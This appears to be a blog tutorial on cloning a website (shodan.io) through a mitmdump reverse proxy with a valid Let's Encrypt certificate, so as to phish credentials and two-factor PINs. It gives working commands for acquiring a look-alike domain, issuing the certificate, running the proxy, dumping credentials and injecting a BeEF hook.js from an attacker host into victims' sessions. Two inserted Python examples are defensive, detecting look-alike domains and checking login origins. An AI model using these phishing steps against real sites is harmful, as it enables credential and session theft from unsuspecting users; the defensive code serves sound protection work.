Introduction
This is going to be a quick down and dirty post on how to effectively create cloned websites on the fly using mitmdump and Let's Encrypt for valid certificates. We'll put a reverse proxy in front of a site in order to create a very convincing, advanced phishing campaign. This is a great way to capture two-factor authentication PINs and attempt automatic VPN logins.
Acquire a domain
There are plenty of different approaches when it comes to acquiring a domain for your phish. Ideally, you will want it to be very similar to your target. Alternative TLDs are an easy way to make convincing phishing attacks. You may also look into recently expired domains that can be acquired. For this tutorial, I'm going to set up blog.chokepoint.net rather than purchase a domain, for demonstration's sake, and demonstrate a phish by setting up a reverse proxy for shodan.io.
CatMyFish is an excellent tool that relies on expireddomains.net in order to find potential expired domains.
Let's Encrypt!
Let's Encrypt is a free, automated, and open CA that's available to anyone who owns a domain or subdomain. They have done a lot of work in helping to create secure connections for millions of websites. While they provide a great and legitimate service, it's often abused by criminals and red teams as well. Certbot is a cross-platform tool for validating that you do indeed own a domain prior to issuing any certificates.
Download certbot
$ wget https://dl.eff.org/certbot-auto
$ chmod a+x certbot-auto
$ ./certbot-auto
Now simply run the following command, and choose "Spin up a temporary webserver (standalone)"
$ ./certbot-auto certonly
Follow the prompts for your e-mail address and domain as appropriate. Your certificates will be placed in /etc/letsencrypt/live/site.domain.here. In order to prepare the certificates for use with our reverse proxy MITM attack, simply concatenate the private key and full-chain certificate into one file.
$ sudo cat /etc/letsencrypt/live/blog.chokepoint.net/privkey.pem /etc/letsencrypt/live/blog.chokepoint.net/fullchain.pem > blog.chokepoint.net.pem
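Every Let's Encrypt certificate is published in Certificate Transparency (CT) logs, which gives the owner of a targeted domain a way to notice look-alike names such as the alternative-TLD and typo variants described above before they are used. The following is an added example, not code from the post: it flags CT-logged names that resemble a brand, and the brand, allow-list, sample names and homoglyph table are constructed assumptions.

```python
"""Spot look-alike domains in a Certificate Transparency (CT) feed.
Added example; brand list, allow-list and sample names are constructed."""

BRANDS = ["shodan"]            # assumption: brand labels we defend
LEGIT_DOMAINS = {"shodan.io"}  # assumption: registrable domains we own
# Constructed sample of subject names as they would appear in a CT feed.
SAMPLE_CT_NAMES = [
    "www.shodan.io",        # our own host
    "shodan.com",           # same label, alternative TLD
    "shodan-login.net",     # brand combined with a keyword
    "sh0dan.io",            # digit standing in for a letter
    "shodam.io",            # one-character typo
    "blog.chokepoint.net",  # unrelated name
]
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})  # digits read as letters

def registrable(name):
    """Approximate the registrable domain as the last two labels (use the PSL in real code)."""
    parts = name.lower().strip(".").split(".")
    return ".".join(parts[-2:])

def levenshtein(a, b):
    """Edit distance, used to catch one-character typos of the brand."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify(name, brands=BRANDS, legit=LEGIT_DOMAINS):
    """Return why `name` looks like a brand impersonation, or None."""
    domain = registrable(name)
    if domain in legit:
        return None
    label = domain.split(".")[0]
    norm = label.translate(HOMOGLYPHS)   # sh0dan -> shodan
    for brand in brands:
        if norm == brand:
            return "alternative TLD" if label == brand else "homoglyph"
        if brand in norm.split("-"):
            return "brand plus keyword"
        if levenshtein(norm, brand) <= 1:
            return "typo"
    return None

def scan(names):
    return {n: classify(n) for n in names if classify(n)}
```

Feed `scan()` the names from a real CT monitor (crt.sh or a log's get-entries output) and alert on anything it returns; the two-label registrable-domain approximation should be replaced with a Public Suffix List lookup in production.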
Download latest mitmproxy
Mitmproxy recently went through some large upgrades that may not have made it into your distribution's repositories yet. We'll go ahead and grab 0.18.2 using pip, as some features regarding the certificates seem to be broken in the 2.* versions.
$ sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev
$ sudo pip3 install mitmproxy==0.18.2
Execute reverse proxy attack
$ sudo mitmdump -R https://www.shodan.io -p 443 --no-upstream-cert --cert blog.chokepoint.net.pem -w blog.log
Notice how the URL bar has the green Secure logo and all.
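The reverse proxy relays the victim's browser to the real site, but that browser still sends Origin and Referer headers naming the proxy's domain, because that is the page its login form was rendered on. The following is an added example, not code from the post: a server-side check the real site could apply to credential POSTs, where the allowed origins and the sample request headers are constructed assumptions.

```python
"""Origin check for a login endpoint that may be sitting behind someone else's reverse proxy.
Added example; the allowed origins and sample request headers are constructed."""
from urllib.parse import urlsplit

# Assumption: the only origins from which the real site serves its login form.
ALLOWED_ORIGINS = {"https://www.shodan.io", "https://account.shodan.io"}

def request_origin(headers):
    """Scheme+host the browser says the form was submitted from, or None."""
    origin = headers.get("Origin")
    if origin and origin.lower() != "null":
        return origin.rstrip("/").lower()
    referer = headers.get("Referer")
    if referer:
        u = urlsplit(referer)
        if u.scheme and u.netloc:
            return f"{u.scheme}://{u.netloc}".lower()
    return None

def login_post_allowed(method, headers, allowed=ALLOWED_ORIGINS):
    """Accept a credential POST only when the browser's origin is one of ours.
    A missing origin fails closed: a browser-submitted form normally carries
    at least one of Origin or Referer."""
    if method.upper() != "POST":
        return True
    return request_origin(headers) in allowed

# Constructed samples: a direct login, a login relayed through a look-alike
# domain by a reverse proxy, a Referer-only client, and a header-less client.
SAMPLE_REQUESTS = {
    "direct": {"Origin": "https://account.shodan.io"},
    "proxied": {"Origin": "https://blog.chokepoint.net",
                "Referer": "https://blog.chokepoint.net/login"},
    "referer_only": {"Referer": "https://www.shodan.io/login?next=/"},
    "no_headers": {},
}

def audit(samples=SAMPLE_REQUESTS):
    """Return {sample name: allowed?} for each constructed POST."""
    return {name: login_post_allowed("POST", h) for name, h in samples.items()}
```

Anything sitting in the middle can alter headers, so treat this as a cheap signal rather than a guarantee; origin-bound authenticators (WebAuthn) are the robust counter to the technique described above, because the signature is bound to the site's real origin.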
Going Beyond
Here are two scripts that will help in dumping credentials, as well as an example script for injecting BeEF hooks into sessions passing through the MITM.
Dumping credentials
Beef injection
Running scripts
In order to execute scripts, use the -s option in mitmdump. For example:
$ sudo mitmdump -R https://www.shodan.io -p 443 --no-upstream-cert --cert blog.chokepoint.net.pem -s ./dump_creds.py -w blog.log
$ sudo mitmdump -R https://www.shodan.io -p 443 --no-upstream-cert --cert blog.chokepoint.net.pem -w blog.log -s "beef_injector.py http://beef.chokepoint.net:3000/hook.js"